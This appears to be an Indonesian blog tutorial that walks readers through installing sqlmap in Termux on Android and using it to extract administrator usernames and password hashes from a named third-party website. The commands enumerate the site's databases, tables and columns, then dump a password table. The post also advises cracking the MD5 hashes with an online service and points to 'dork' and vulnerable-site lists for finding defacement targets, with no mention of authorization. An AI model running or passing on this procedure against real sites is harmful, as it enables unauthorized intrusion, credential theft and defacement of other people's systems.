Cara Mendapatkan Username & Password dengan Sqlmap di Termux

Cara Mendapatkan Username & Password dengan Sqlmap di Termux
Daftar Isi Artikel


Pada tutorial kali ini kami akan sharing bagaimana cara mendapatkan Username & Password dengan Sqlmap di android. Cara ini sebagai referensi untuk kamu yang tidak ada laptop / Pc .
Untuk media belajar SQL . Oke langsung ke tutorialnya :

Kamu langsung download termux di android melalui google playstore. Setelah aplikasi terinstal kamu ikuti perintah di bawah ini . Ketikkan :

$ apt update -y && apt upgrade -y
$ pkg install nano -y
$ pkg install git -y
$ pkg install python -y
$ pkg install python2 -y

lalu kamu install SQLmap nya. Ketikkan :

$ git clone https://github.com/sqlmapproject/sqlmap.git
$ cd sqlmap
$ python2 sqlmap.py

Jika sudah terinstal semua kamu bisa belajar dork pada post ini DORK AMPUH SENJATA DEFACE untuk mendapatkan target yang fresh. Atau jika kamu langsung ingin mendapatkan target kamu bisa mengambilnya pada post ini KUMPULAN WEBSITE SQL 2019 

Disini kami memilih target http://chinamost.com/en/news_detail.php?id=30 lalu ketikkan pada termux

$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30 --dbs

* Perintah ini digunakan untuk mencari database apa saja yang ada di website tersebut

SQLmap mendapatkan 5 database yang ada didalam website tersebut. Lalu kita akan memilih database cn_db untuk mendapatkan informasi Tables . Ketikkan :

$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30 --tables -D cn_db




* Perintah di atas digunakan untuk melihat tables pada database yang di hasilkan oleh --dbs

Disini kami mendapatkan 5 tables pada database cn_db. Lalu untuk mendapatkan informasi Username dan Password, Biasanya ada di nama tables Admin / Password / User / Login dan kami disini akan mencoba untuk mencari columns Password . Ketikkan :

$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30  -D cn_db -T Password  --columns



*perintah di atas digunakan untuk melihat columns database yang di hasilan dari --tables Password

Dari tables password ada 4 columns yaitu id , loginname , password dan salt. Ini adalah informasi login di website tersebut. Oke untuk mengetahui informasinya kita akan dump columns nya . Ketikkan :

$ python2 sqlmap.py -u http://chinamost.com/en/news_detail.php?id=30  -D cn_db -T Password  --dump



* perintah di atas digunakan untuk mengambil data base dari columns password di baris columns username&password

Oke disini kami berhasil mendapatkan Informasi login username dan password di website tersebut. Password yang kami dapatkan masih berbentuk md5. Jika kamu ketemu password yang sudah terencrypt kamu harus crack password tersebut. SQLmap sebenarnya menyediakan untuk crack password tersebut akan tetapi menurut kami kurang begitu bagus. Kamu bisa crack password melalui crack station online yang ada di google

Dan berikut adalah perintah dasar yang bisa kamu pakai di SQLmap :

python2 sqlmap.py -u http://webtarget.com --dbs
python2 sqlmap.py -u http://webtarget.com -D NamaDataBase --tables
python2 sqlmap.py -u http://webtarget.com -D NamaDataBase -T NamaTables --columns
python2 sqlmap.py -u http://webtarget.com -D NamaDataBase -T NamaTables -C NamaColumns, USer --dump

Oke cukup sekian tutorial Cara Mendapatkan Username & Password dengan Sqlmap di Termux sampai ketemu di tutorial selanjutnya

★★★★